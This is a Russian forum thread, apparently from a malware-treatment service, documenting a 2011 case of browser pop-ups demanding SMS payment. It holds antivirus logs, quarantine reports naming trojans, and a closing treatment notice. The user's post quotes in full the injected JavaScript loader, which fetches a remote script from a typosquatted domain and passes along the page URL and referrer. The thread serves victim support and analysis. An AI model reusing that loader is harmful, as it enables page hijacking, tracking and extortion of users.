Показано с 1 по 4 из 4.

Всплывающее окно в браузерах (заявка №92848)

  1. #1
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Всплывающее окно в браузерах (заявка №92848)

    Пользователь обратился в сервис 911, указав на следующие проблемы в работе его компьютера:
    В браузере Opera появилось всплывающее окно с уведомлением об угрозе и предложением скачать обновление безопасности. В браузере FireFox появилось аналогичное окно. Я нажал в Opera согласиться после чего этот браузер повис и я завершил его работу. Вскоре после этого на всех сайтах стали появляться всплывающие окна следующего содержания:

    zlo.rt.mipt.ru
    Последний просмотр контента: 2011-06-28 23:21:23
    Вход с ИП: **.***.*.** (мой ИП)
    Город: *****(мой город)
    Провайдер: **** (мой провайдер)
    Оплатите, отправив смс с текстом 2262348568 на номер 3381.
    Если смс не отправляется, отправьте смс
    с тем же текстом на номер 3121.
    Введите полученный в смс код:

    Напоминание пропадет навсегда.
    Вы можете закрыть данное напоминание нажав на кнопку закрыть
    Напоминаем Вам, что Контент на нашем сайте платный и Вы подтвердили это согласившись с правилами. Ознакомившись с 10 бесплатными единицами контента, Вы так же просмотрели еще 0.
    Если Вы не согласны оплатить, то мы готовы предоставить полные логи посещения нашего сайта, в котором с Вашего айпи был произведен вход и перед просмотром Вы ознакомились с правилами. Если Вы считаете, что логи принадлежат не Вам, сообщите по адресу support@bloka.net

    СМС я естественно не отправлял а запустил проверку антивирусом. Антивирус ESET NOD 32 3.0.695.0 выдал нашел следующие угрозы:
    28.06.2011 21:51:42 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.
    28.06.2011 21:51:41 Фильтр HTTP файл http://vngue.ru/0000.zip модифицированный Java/Exploit.CVE-2010-0844.A троянская программа соединение прервано - изолирован SAGE\Dima Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Java\jre6\bin\java.exe.

    Однако после сканирования проблема не пропала. Сегодняшнее сканирование результатов не дало.

    Что я еще заметил (вдруг пригодится):

    плагин NoScript успешно блокирует всплывающие окна но это полумера.
    вирус подгружает всплывающее окно следующим javascript'ом
    <script>if(self==top){
    document.write("<script src='http" +
    (("https:" == document.location.protocol) ? "s" : "") +
    "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("QiGkg6f+UD O4hH0ZSZ74wGvxOOqU5PDPz8tqQ2su0IwFECbYdJ2PbWWLiTJa ZF/p")+"&r="+escape(document.referrer)+"&u="+escape(d ocument.URL)+"&v=351&"+Math.random()+"'>"+unescape ("%3C/script%3E"));}</script>
    Дата обращения: 30.06.2011 1:11:59
    Номер заявки: 92848

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Отчет о карантине

    30.06.2011 2:20:09 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
      • размер: 691696 байт
      • дата файла: 30.08.2010 21:50:22
      • версия: "1.62.0.0 built by: WinDDK"
      • копирайты: "Copyright (C) 2004"
    2. C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
      • размер: 691696 байт
      • версия: "1.62.0.0 built by: WinDDK"
      • копирайты: "Copyright (C) 2004"


  4. #3
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Отчет о карантине

    30.06.2011 12:30:08 на зараженном компьютере были обнаружены следующие вредоносные файлы:
    1. C:\\WINDOWS\\System32\\Drivers\\sptd.sys - подозрительный, обрабатывается вирлабом
      • размер: 691696 байт
      • дата файла: 30.08.2010 21:50:22
      • версия: "1.62.0.0 built by: WinDDK"
      • копирайты: "Copyright (C) 2004"
    2. C:\\WINDOWS\\system32\\vgcqtpe.dll - Trojan.Win32.Agent.nyzu
      • размер: 57344 байт
      • дата файла: 28.06.2011 21:51:46
      • детект других антивирусов: DrWEB 6.0: Зловред Trojan.Mayachok.1; BitDefender: Зловред Trojan.Generic.6203310; Avast4: Зловред Win32:Dropper-HDL [Drp]
    3. C:\\WINDOWS\\system32\\vgcqtpe.dll - подозрительный, обрабатывается вирлабом
      • размер: 691696 байт
      • версия: "1.62.0.0 built by: WinDDK"
      • копирайты: "Copyright (C) 2004"


  5. #4
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,318
    Вес репутации
    954

    Итог лечения

    30.06.2011 12:32:59 лечение успешно завершено

Похожие темы

  1. всплывающее окно в браузере firefox (заявка №93409)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 15.07.2011, 08:01
  2. Ответов: 9
    Последнее сообщение: 23.06.2011, 20:43
  3. Всплывающее окно в браузерах (заявка №87749)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 21.06.2011, 17:00
  4. Всплывающее окно в браузере (заявка №64421)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 07.04.2011, 23:00
  5. всплывающее окно рекламы (заявка №2257)
    От CyberHelper в разделе Отчеты сервиса лечения VirusInfo
    Ответов: 2
    Последнее сообщение: 11.02.2010, 03:00

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00116 seconds with 16 queries